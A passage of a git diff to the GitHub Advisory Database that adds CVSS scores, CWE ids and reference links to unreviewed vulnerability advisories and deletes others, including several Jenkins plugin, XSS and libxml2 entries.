"2022-04-30T18:22:07Z", "aliases": [ "CVE-2002-1914" ], "details": "dump 0.4 b10 through b29 allows local users to cause a denial of service (execution prevention) by using flock() to lock the /etc/dumpdates file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json b/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json index cf5c8ff979ec1..2fb2a6330c162 100644 --- a/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json +++ b/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xr97-cg4f-4xr7", - "modified": "2022-04-30T18:15:52Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:15:52Z", "aliases": [ "CVE-2001-0334" ], "details": "FTP service in IIS 5.0 and earlier allows remote attackers to cause a denial of service via a wildcard sequence that generates a long string when it is expanded.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json b/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json index 34cd13be7fc5e..03eac1310a746 100644 --- a/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json +++ b/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json @@ -45,18 +45,38 @@ "type": "WEB", "url": "https://bugs.python.org/issue41944" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3Cissues.bookkeeper.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3Cissues.bookkeeper.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RSLQD5CCM75IZGAMBDGUZEATYU5YSGJ7/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGIY6I4YS3WOXAK4SXKIEOC2G4VZKIR7/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSLQD5CCM75IZGAMBDGUZEATYU5YSGJ7/" @@ -65,6 +85,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGIY6I4YS3WOXAK4SXKIEOC2G4VZKIR7/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-04" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201123-0004/" diff --git a/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json b/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json deleted file mode 100644 index 427939f73de7b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-22x7-vwh9-5w4g", - "modified": "2022-05-24T19:15:12Z", - "published": "2022-05-24T19:15:12Z", - "aliases": [ - "CVE-2021-32297" - ], - "details": "An issue was discovered in LIEF through 0.11.4. A heap-buffer-overflow exists in the function main located in pe_reader.c. It allows an attacker to cause code Execution.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32297" - }, - { - "type": "WEB", - "url": "https://github.com/lief-project/LIEF/issues/449" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-787" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2021-09-20T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json b/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json deleted file mode 100644 index eecb443848dc4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-23r7-hf6g-qqqg", - "modified": "2022-05-13T01:25:41Z", - "published": "2022-05-13T01:25:41Z", - "aliases": [ - "CVE-2019-1003090" - ], - "details": "A cross-site request forgery vulnerability in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003090" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json b/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json deleted file mode 100644 index 70c640d3af28c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-23xr-9xxr-vg3c", - "modified": "2022-05-13T01:48:37Z", - "published": "2022-05-13T01:48:37Z", - "aliases": [ - "CVE-2018-1000420" - ], - "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000420" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(1)" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-863" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json b/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json index 414ef7633637d..7fec4d6219f38 100644 --- a/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json +++ b/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-25vf-27mm-c4fh", - "modified": "2022-05-01T18:21:55Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:21:55Z", "aliases": [ "CVE-2007-4268" ], "details": "Integer signedness error in the Networking component in Apple Mac OS X 10.4 through 10.4.10 allows local users to execute arbitrary code via a crafted AppleTalk message with a negative value, which satisfies a signed comparison during mbuf allocation but is later interpreted as an unsigned value, which triggers a heap-based buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -57,7 +60,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-681" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json b/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json deleted file mode 100644 index ddc016554f20e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-268v-2qq7-84pf", - "modified": "2022-05-13T01:18:20Z", - "published": "2022-05-13T01:18:20Z", - "aliases": [ - "CVE-2017-1000243" - ], - "details": "Jenkins Favorite Plugin 2.1.4 and older does not perform permission checks when changing favorite status, allowing any user to set any other user's favorites", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000243" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-06-06/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/101946" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-11-01T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json b/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json deleted file mode 100644 index 3d0f7b205b82e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-26hw-262c-g9gc", - "modified": "2022-05-14T03:13:12Z", - "published": "2022-05-14T03:13:12Z", - "aliases": [ - "CVE-2018-1000190" - ], - "details": "A exposure of sensitive information vulnerability exists in Jenkins Black Duck Hub Plugin 4.0.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000190" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-865" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json b/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json deleted file mode 100644 index 7b3fb5e77b9d5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-278v-j3cr-jv2x", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003020" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins Kanboard Plugin 1.5.10 and earlier in KanboardGlobalConfiguration.java that allows attackers with Overall/Read permission to submit a GET request to an attacker-specified URL.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003020" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-818" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json b/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json deleted file mode 100644 index 50f832f0d1623..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2cm5-f78c-h2c8", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2652" - ], - "details": "It was found that there were no permission checks performed in the Distributed Fork plugin before and including 1.5.0 for Jenkins that provides the dist-fork CLI command beyond the basic check for Overall/Read permission, allowing anyone with that permission to run arbitrary shell commands on all connected nodes.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2652" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/96980" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-287" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-07-27T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json b/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json deleted file mode 100644 index 7838a03399712..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json +++ /dev/null @@ -1,83 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2j76-26qq-7rvv", - "modified": "2022-05-17T05:49:23Z", - "published": "2022-05-17T05:49:23Z", - "aliases": [ - "CVE-2010-2969" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2969" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.7/rev/37306fba2189" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" - }, - { - "type": "WEB", - "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" - }, - { - "type": "WEB", - "url": "http://moinmo.in/MoinMoinRelease1.9" - }, - { - "type": "WEB", - "url": "http://moinmo.in/SecurityFixes" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40836" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2083" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/40549" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1981" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-08-05T13:22:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json b/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json deleted file mode 100644 index 24ace53835e71..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2q2r-xgj5-h3hm", - "modified": "2022-05-02T03:48:54Z", - "published": "2022-05-02T03:48:54Z", - "aliases": [ - "CVE-2009-3821" - ], - "details": "Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3821" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-014/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-28T10:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json b/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json deleted file mode 100644 index 2bc8b471e195a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2r46-cwgm-vvjx", - "modified": "2022-05-13T01:15:04Z", - "published": "2022-05-13T01:15:04Z", - "aliases": [ - "CVE-2019-10279" - ], - "details": "A missing permission check in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10279" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json b/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json index 701e9d5e090e2..69e061c33c981 100644 --- a/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json +++ b/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2v24-xp2p-2gfc", - "modified": "2022-05-01T01:50:36Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-05-01T01:50:36Z", "aliases": [ "CVE-2005-0587" ], "details": "Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json index 2cf5c05604ccb..6daa15252e1db 100644 --- a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json +++ b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2vw2-h5mp-gfhw", - "modified": "2022-05-02T03:35:01Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T03:35:01Z", "aliases": [ "CVE-2009-2416" ], "details": "Multiple use-after-free vulnerabilities in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allow context-dependent attackers to cause a denial of service (application crash) via crafted (1) Notation or (2) Enumeration attribute types in an XML file, as demonstrated by the Codenomicon XML fuzzing framework.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -177,7 +180,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json b/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json deleted file mode 100644 index 7b42fb23ca3cb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2wgg-c8xc-7gg3", - "modified": "2022-05-02T03:46:56Z", - "published": "2022-05-02T03:46:56Z", - "aliases": [ - "CVE-2009-3628" - ], - "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to determine an encryption key via crafted input to a tt_content form element.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3628" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53917" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json b/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json deleted file mode 100644 index 8bbfc81715c23..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-33jj-92px-m4g7", - "modified": "2022-05-24T17:45:29Z", - "published": "2022-05-24T17:45:29Z", - "aliases": [ - "CVE-2020-19626" - ], - "details": "Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via /admin/settings/sites/new.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19626" - }, - { - "type": "WEB", - "url": "https://github.com/craftcms/cms/commit/76a2168b6a5e30144f5c06da4ff264f4eca577ff" - }, - { - "type": "WEB", - "url": "http://mayoterry.com/file/cve/XSS_vuluerability_in_Craftcms_3.1.31.pdf" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2021-03-26T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json b/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json deleted file mode 100644 index de677a2a595d6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3858-58w9-wpcg", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003021" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins OpenId Connect Authentication Plugin 1.4 and earlier in OicSecurityRealm/config.jelly that allows attackers able to view a Jenkins administrator's web browser output, or control the browser (e.g. malicious extension) to retrieve the configured client secret.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003021" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-886" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json b/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json deleted file mode 100644 index 20ca42e366f73..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-3892-qqv6-h2qm", - "modified": "2022-05-14T03:18:39Z", - "published": "2022-05-14T03:18:39Z", - "aliases": [ - "CVE-2018-1000177" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000177" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-04-16/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - 